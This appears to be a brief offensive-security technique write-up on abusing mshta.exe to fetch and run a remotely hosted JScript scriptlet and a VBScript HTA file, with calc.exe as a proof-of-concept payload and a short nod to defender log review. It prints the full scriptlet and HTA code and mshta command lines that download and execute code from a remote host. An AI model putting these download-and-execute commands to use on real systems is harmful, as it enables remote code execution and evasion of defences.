Writing a scriptlet file that will launch calc.exe when invoked:
http://10.0.0.5/m.sct<?XML version="1.0"?><scriptlet><registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>​<public><method name="Exec"></method></public>​<script language="JScript"><![CDATA[function Exec() {var r = new ActiveXObject("WScript.Shell").Run("calc.exe");}]]></script></scriptlet>
Invoking the scriptlet file hosted remotely:
# from powershell/cmd /c mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();
As expected, calc.exe is spawned by mshta.exe. Worth noting that mhsta and cmd exit almost immediately after invoking the calc.exe:
As a defender, look at sysmon logs for mshta establishing network connections:
Also, suspicious commandlines:
The hta file can be invoked like so:
mshta.exe http://10.0.0.5/m.hta
or by navigating to the file itself, launching it and clicking run:
http://10.0.0.5/m.hta<html><head><script language="VBScript">Sub RunProgramSet objShell = CreateObject("Wscript.Shell")objShell.Run "calc.exe"End SubRunProgram()</script></head><body>Nothing to see here..</body></html>